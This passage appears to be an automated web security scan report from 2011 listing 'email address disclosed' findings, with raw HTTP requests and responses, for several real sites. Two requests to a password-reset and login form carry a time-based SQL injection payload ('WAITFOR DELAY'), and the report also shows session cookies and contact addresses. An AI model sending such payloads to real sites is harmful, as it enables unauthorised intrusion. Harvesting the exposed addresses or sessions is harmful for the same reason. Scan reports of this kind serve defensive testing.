Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4039


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.22. http://hmficweb.hinghammutual.com/products/cascoauto/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/cascoauto/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cascoauto/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/products/cascoauto
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6893


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.23. http://hmficweb.hinghammutual.com/products/commercialinsurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/commercialinsurance/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/commercialinsurance/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/products/commercialinsurance/bop
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.24. http://hmficweb.hinghammutual.com/products/commercialinsurance/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/commercialinsurance/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

POST /products/commercialinsurance/Default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/products/commercialinsurance/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate
Content-Length: 66

__VIEWSTATE=%2fwEPDwULLTEzODIwMDg1MjRkZNVb2f0oujwbNi2PP08PfKqUS8Wb

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:46:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.25. http://hmficweb.hinghammutual.com/products/commercialinsurance/bop/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/commercialinsurance/bop/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/commercialinsurance/bop/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/products/commercialinsurance/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:46:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6216


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.26. http://hmficweb.hinghammutual.com/products/commercialinsurance/inlandmarine/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/commercialinsurance/inlandmarine/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/commercialinsurance/inlandmarine/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/products/commercialinsurance/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:46:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.27. http://hmficweb.hinghammutual.com/products/personal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/personal/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/personal/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/products/personal/homeowners
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5005


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/products.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEdi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.28. http://hmficweb.hinghammutual.com/reglogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /reglogin.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /reglogin.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7626


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.29. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The following email address was disclosed in the response:

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=slhdu6ps008c709l4olril4430
Accept-Encoding: gzip, deflate
Content-Length: 97

btnCancel=%27;WAITFOR%20DELAY%20%270:0:25%27--&btnSubmit=Submit&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:30:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3810
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<input id="txtEmail" name="txtEmail" type="text" value="netsparker@example.com" style="width:300px" onblur="validatePresent(this,'msg_email');" />
...[SNIP]...
27.30. https://secure.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

POST /index.php HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=todvqp9ae2pb55so66dlntmpe4
Accept-Encoding: gzip, deflate
Content-Length: 93

btnLogin=%27;WAITFOR%20DELAY%20%270:0:25%27--&txtEmail=netsparker%40example.com&txtPassword=3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:52:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5083
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<input id="txtEmail" name="txtEmail" type="text" value="netsparker@example.com" style="width: 200px" onblur="validatePresent(this,'msg_user');" />
...[SNIP]...
27.31. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /subscribe/CCI_Custserve.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /subscribe/CCI_Custserve.aspx HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lvsr30zwf1fkw5aao1zymfq2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:27 GMT
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Haymarket
...[SNIP]...
<a href="mailto:haymarket@cambeywest.com">
...[SNIP]...
27.32. http://tours.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="mailto:support@sapha.com" title="Sapha Support">
...[SNIP]...
27.33. http://www.advancedaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:47 GMT
Content-Type: text/html
Content-Location: http://www.advancedaccess.com/Index.html
Last-Modified: Fri, 18 Feb 2011 23:37:46 GMT
Accept-Ranges: bytes
ETag: "9446e9d8c4cfcb1:586"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<script language="javascript">
var fo = new SWFObject("/Flash_files/rssreaderv3rev4.swf", "topswf", "625", "130", "8", "#ffffff", true);
   fo.addVariable("em", "emailers@advancedaccess.com");
   fo.addParam("scale", "exactfit");
   fo.addParam("menu", "false");
   fo.addParam("wmode", "transparent");
   fo.write("blogrss");
    </script>
...[SNIP]...
<input type="hidden" name="bCcEmail" value="emailers@advancedaccess.com" />
...[SNIP]...
<input type="hidden" name="ToAddress" value="info@advancedaccess.com" />
...[SNIP]...
<input type="hidden" name="bCcEmail" value="emailers@advancedaccess.com" />
...[SNIP]...
<input type="hidden" name="ToAddress" value="info@advancedaccess.com" />
...[SNIP]...
<a href="mailto:info@advancedaccess.com">
...[SNIP]...
<a href="mailto:info@advancedaccess.com" style="font-weight:normal;font-size:10pt">info@advancedaccess.com</a>
...[SNIP]...
27.34. http://www.advancedaccess.com/swf/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /swf/swfobject.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /swf/swfobject.js HTTP/1.1
Host: www.advancedaccess.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=157889130.; __utmxx=157889130.; __utmx_k_251695440=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 18:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCTRCCR=MPAAIBGAIMAIDFIHHJCBFNKP; path=/
Cache-control: private
Content-Length: 19690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Real Estate Website Design, Internet Marketing - Advanced
...[SNIP]...
<input type="hidden" name="bCcEmail" value="emailers@advancedaccess.com" />
...[SNIP]...
<input type="hidden" name="ToAddress" value="info@advancedaccess.com" />
...[SNIP]...
<input type="hidden" name="ToAddress" value="info@advancedaccess.com">
<input type="hidden" name="bCcEmail" value="emailers@advancedaccess.com" />
...[SNIP]...
<a href="mailto:info@advancedaccess.com">
...[SNIP]...
<a href="mailto:info@advancedaccess.com" style="font-weight:normal;font-size:10pt">info@advancedaccess.com</a>
...[SNIP]...
27.35. http://www.advisorsquare.com/design_gallery/fsplash/ProtectRClick.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /design_gallery/fsplash/ProtectRClick.js

Issue detail

The following email address was disclosed in the response:

Request

GET /design_gallery/fsplash/ProtectRClick.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 06 Jul 2007 22:32:54 GMT
Accept-Ranges: bytes
ETag: "295e46981dc0c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:06 GMT
Content-Length: 174

function cancelclick() {
if (window.event.button==2){
alert("For more splash information, call 1-800-251-3863 OR email support@advisorsquare.com");
}
}    
27.36. http://www.advisorsquare.com/new/asframeless02/content.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /new/asframeless02/content.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /new/asframeless02/content.asp?contentid=2016551940 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4006
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PEPGGKOBHIEHNDFHNNDECDJH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:29 GMT

<html>
<head>
<link rel="STYLESHEET" type="text/css" href="/new/asframeless02/content.asp?contentid=2016552783">
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="Content-Type" con
...[SNIP]...
<A href="mailto:al@advisorsquare.com">al@advisorsquare.com</A>
...[SNIP]...
27.37. http://www.advisorsquare.com/new/asle05/content.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /new/asle05/content.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /new/asle05/content.asp?contentid=2016654382 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7824
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=BAHHGKOBKBCFJNFLLADEPNPM; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:06 GMT

<HTML>
<HEAD>
<LINK href="/new/asle05/content.asp?contentid=2016654382" rel="stylesheet" type="text/css">
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-0">
</HEAD>

<BODY>
...[SNIP]...
<a href="mailto:asd@asd.com">asd@asd.com</a>
...[SNIP]...
27.38. http://www.agentadvantage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agentadvantage.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.agentadvantage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:50 GMT
Server: Apache/2.0.59 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html x
...[SNIP]...
<a href="mailto:sales@instantservice.com">
...[SNIP]...
27.39. http://www.agentadvantage.com/resources/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agentadvantage.com
Path:   /resources/js/s_code.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /resources/js/s_code.js HTTP/1.1
Host: www.agentadvantage.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:54 GMT
Server: Apache/2.0.59 (CentOS)
Last-Modified: Tue, 11 Aug 2009 12:16:20 GMT
ETag: "1ece23-67bb-ab8b6d00"
Accept-Ranges: bytes
Content-Length: 26555
Connection: close
Content-Type: application/x-javascript

/***********************************************/
/*
SiteCatalyst code version: H.19.4.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
04.15.2009
*/
/***********************************************/

var s_account="deagentadvantage"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/
...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...
27.40. http://www.brownrudnick.com/nr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/

Issue detail

The following email address was disclosed in the response:

Request

GET /nr/ HTTP/1.0
Pragma: no-cache
Host: www.brownrudnick.com
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Location: http://www.brownrudnick.com/nr/Default.htm
Date: Fri, 06 May 2011 18:48:10 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 06 May 2011 16:34:57 GMT
ETag: "c8398589bccc1:1911"
Content-Length: 14757

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - News and Resources</title>
<
...[SNIP]...
<a href="../disc/cntcdisclaimer.asp?ID=458">
           jmcelhenney@brownrudnick.com</a>
...[SNIP]...
27.41. http://www.caribbean-ocean.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:56:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Set-Cookie: PHPSESSID=tnd3bva6krhipm1j4ohktv3s79ifsgn9; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29224

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>
<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SDa
...[SNIP]...
<area shape="rect" coords="570,65 794,50" href="mailto:caribbean@theholidaygroup.com" alt="caribbean@theholidaygroup.com">
...[SNIP]...
27.42. http://www.caribbean-ocean.com/accommodation2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The following email address was disclosed in the response:

Request

GET /accommodation2.php?id=8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
